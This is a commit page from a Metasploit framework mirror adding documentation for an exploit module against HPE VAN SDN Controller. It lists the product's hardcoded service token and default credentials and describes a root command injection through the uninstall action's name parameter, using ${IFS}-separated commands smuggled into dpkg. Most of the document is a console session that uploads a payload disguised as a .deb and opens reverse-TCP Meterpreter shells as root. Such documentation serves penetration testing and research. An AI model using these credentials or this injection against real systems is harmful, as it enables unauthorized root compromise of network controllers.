infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add module doc

GSoC/Meterpreter_Web_Console
William Vu 2018-07-03 18:31:43 -05:00
parent 41b0adad88
commit 12a0aaeaf1
1 changed files with 85 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

85
documentation/modules/exploit/linux/http/hp_van_sdn_token.md Normal file
View File

@ -0,0 +1,85 @@
## Intro
This module exploits a hardcoded service token or default credentials in
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
A root command injection was discovered in the uninstall action's name
parameter, obviating the need to use sudo for privilege escalation.
If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
will be used for authentication. An additional login request will be
sent.
## Setup
Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.
Tested on 2.7.18.0503.
## Options
**TOKEN**
Set this to the service token. Defaults to `AuroraSdnToken37`.
**USERNAME**
Set this to the service username. Defaults to `sdn`.
**PASSWORD**
Set this to the service password. Defaults to `skyline`.
## Usage
```
msf5 > use exploit/linux/http/hp_van_sdn_token
msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102
rhosts => 192.168.56.102
msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(linux/http/hp_van_sdn_token) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.56.102
OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(linux/http/hp_van_sdn_token) > set token ""
token =>
msf5 exploit(linux/http/hp_van_sdn_token) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
meterpreter >
```